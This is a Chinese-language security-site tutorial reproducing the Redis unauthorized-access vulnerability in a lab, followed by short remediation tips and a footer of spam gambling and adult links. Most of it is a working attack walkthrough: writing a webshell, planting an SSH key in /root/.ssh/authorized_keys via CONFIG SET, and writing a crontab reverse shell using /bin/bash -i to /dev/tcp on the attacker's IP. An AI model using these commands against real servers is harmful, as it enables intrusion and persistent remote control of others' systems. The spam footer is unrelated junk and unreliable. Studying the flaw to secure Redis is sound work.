歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

Redis未授權訪問漏洞復現

來源:本站整理 作者:佚名 時間:2020-01-19 TAG: 我要投稿


漏洞復現
攻擊機
kali
 ip:192.168.70.140
靶機
Ubuntu 16.04 
ip:192.168.70.133
一、環境搭建
1、下載安裝redis
wgethttp://download.redis.io/releases/redis-3.2.11.tar.gz
2、 解壓壓縮包
tarzxvfredis-3.2.11.tar.gz。
3、進入解壓目錄redis-3.2.11 執行make命令
4、 進入src目錄 cd redis-3.2.11/src
5、將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了)


返回目錄redis-2.8.17,將redis.conf拷貝到/etc/目錄下:

使用/etc/目錄下的reids.conf文件中的配置啟動redis服務:

6、編輯etc中的redis配置文件redis.conf
去掉ip綁定,允許除本地外的主機遠程登錄redis服務 前面加#注釋掉

關閉保護模式,允許遠程連接redis服務將yes 改為no

二、利用方式
寫入webshell
測試目標靶機是否存在未授權訪問,下面靶機存在未授權訪問
1.遠程連接redis

2.在靶機寫入cs.php文件
我們將shell寫入/home/ubuntus/cs目錄下
save保存

3.在靶機查看,有cs.php文件,shell寫入完成

如果寫入網站服務的路徑下,后續可以使用工具連接shell
通過寫入SSH公鑰實現ssh登錄
原理就是在數據庫中插入一條數據,將本機的公鑰作為value,key值隨意,然后通過修改數據庫的默認路徑為/root/.ssh和默認的緩沖文件authorized.keys,把緩沖的數據保存在文件里,這樣就可以在服務器端的/root/.ssh下生一個授權的key
1、首先在攻擊機(kali)上生成ssh公鑰

進入.ssh目錄:cd.ssh/
2.將公鑰寫入key.txt文件(前后用\n換行,避免和redis里其他緩存數據混合)
(echo -e”\n”;cat id_rsa.pub;echo -e “\n”)>key.txt

3.將key.txt寫靶機(使用redis-cli -h ip命令連接靶機,寫入文件)
cat key.txt|redis-cli -h 192.168.70.133 -x set crack

4.遠程登錄靶機的Redis服務,redis-cli -h 192.168.70.140
5.更改redis備份路徑為ssh公鑰存放目錄
6.設置上傳公鑰的備份文件名字為authorized_keys
save保存

7.在攻擊機上直接ssh免密登錄靶機,免密登錄成功

nc反彈
目標計為centos
在攻擊機(kali)執行 nc -v -l -p 9999 監聽
連接目標主機:redis-cli -h 192.168.70.140
寫入shell并保存
set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.70.140/9999 0>&1\n\n”
config set dir /var/spool/cron
config set dbfilename root
save
客戶端會收到目標機的反彈shell。**在ubuntu測試計劃任務寫入成功但不執行
config set dir /var/spool/cron/ //配置文件夾的路徑(CONFIG SET 命令可以動態地調整 Redis 服務器的配置而(configuration)而無須重啟。)//每個用戶生成的crontab文件,都會放在 /var/spool/cron/ 目錄下面
set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.70.140/9999 0>&1\n\n”
//直接往當前用戶的crontab里寫入反彈shell,換行也是必須的
三、修復建議
1.禁止一些高危命令
2.以低權限運行 Redis 服務
3.禁止外網訪問 Redis
 

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺 好看的欧美a片电影系列 极速快3合法吗 今天排列三试机号和开机号 快播哪能看到日韩a片 在网上怎么玩股票 吉林心悦麻将网页下载 北京28被骗经历 大乐′透开奖结果 有板深雪 智飞生物股票股吧 北京快速赛车怎么玩 安徽快3遗漏数据统计表 浙江11选5第38期 快乐赛车 pk10赛车6码345678公式 二分彩后二玩法